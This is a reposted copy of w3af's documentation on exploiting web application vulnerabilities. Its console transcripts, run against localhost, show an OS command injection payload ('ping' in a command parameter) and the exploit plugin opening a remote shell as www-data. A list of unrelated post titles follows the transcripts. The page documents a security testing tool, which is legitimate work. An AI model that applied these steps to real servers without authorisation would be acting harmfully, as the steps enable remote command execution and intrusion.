Exploiting Web application vulnerabilities
来源:互联网 发布:民航大数据发展状况 编辑:程序博客网 时间:2024/06/06 04:59
http://docs.w3af.org/en/latest/exploitation.html
w3af
allows users to exploit Web application vulnerabilities in an automated manner. The vulnerabilities to be exploited can be identified using audit
plugins or manually by the user (and then the vulnerability details are provided to w3af
).
During the scan vulnerabilities are found and stored in specific locations of the knowledge base, from where exploit plugins can read and use the stored information to exploit the vulnerability. Exploiting a vulnerability identified by an audit plugin is easy:
w3af>>> pluginsw3af/plugins>>> audit os_commandingw3af/plugins>>> backw3af>>> targetw3af/config:target>>> set target http://localhost/w3af/os_commanding/v.php?command=f0as9w3af/config:target>>> backw3af>>> startFound 1 URLs and 1 different points of injection.The list of URLs is:- http://localhost/w3af/os_commanding/v.phpThe list of fuzzable requests is:- http://localhost/w3af/os_commanding/v.php | Method: GET | Parameters: (command)Starting os_commanding plugin execution.OS Commanding was found at: "http://localhost/w3af/os_commanding/v.php", using HTTP method GET.The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.Finished scanning process.w3af>>> exploitw3af/exploit>>> exploit os_commandingos_commanding exploit plugin is starting.Vulnerability successfully exploited. This is a list of available shells:- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>Please use the interact command to interact with the shell objects.w3af/exploit>>> interact 0Execute "end_interaction" to get out of the remote shell.Commands typed in this menu will run on the remote web server.w3af/exploit/os_commanding-0>>> lsv.phpv2.phpv3.phpw3af/exploit/os_commanding-0>>> end_interactionw3af/exploit>>> backw3af>>>
Exploiting one you’ve found manually, requires you to provide some input:
w3af>>> kbw3af/kb>>> help| list | List the items in the knowledge base.| add | Add a vulnerability to the KBw3af/kb>>> add os_commandingw3af/kb/config:os_commanding>>> view| operating_system | Remote operating system (linux or windows).| name | Vulnerability name (eg. SQL Injection)| url | URL (without query string parameters)| vulnerable_parameter | Vulnerable parameter| separator | Command separator used for injecting commands.| data | Query string or postdata parameters in url-encoded form| method | HTTP methodw3af/kb/config:os_commanding>>>
You simply set
all the configuration settings and then execute save
and back
to store your vulnerability in the knowledge base. Once the information is there you’ll be able to follow the same steps:
w3af>>> exploitw3af/exploit>>> exploit os_commandingos_commanding exploit plugin is starting.Vulnerability successfully exploited. This is a list of available shells:- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>Please use the interact command to interact with the shell objects.
- Exploiting Web application vulnerabilities
- Five common Web application vulnerabilities
- Web Application Vulnerabilities: Detect, Exploit, Prevent
- Web Application Vulnerabilities: Detect, Exploit, Prevent
- Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
- The Web Application Hacker's Handbook: Discovering and Exploiting, Security Flaws (Paperback) Oct.2007.eBook-BBL
- The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
- The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd
- Web Application Vulnerabilities: Detect, Exploit, Prevent (Paperback), Sep.2007.eBook-BBL
- Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
- Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Web Application
- Web Application
- Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
- Developing a Web Application
- Servlet In Web Application
- Android动画开发——Animation动画效果
- 黑马程序员----C 语言学习笔记之数组指针与字符串指针
- OCP-V13-009
- 白盒测试与黑盒测试
- 软件工程之需求分析
- Exploiting Web application vulnerabilities
- 树木 - 风区 Tree - Wind Zones
- [软考]背包问题
- java SE复习笔记48
- 数组指针解析
- 20150927
- OCP-V13-010
- java SE复习笔记49
- 测试用例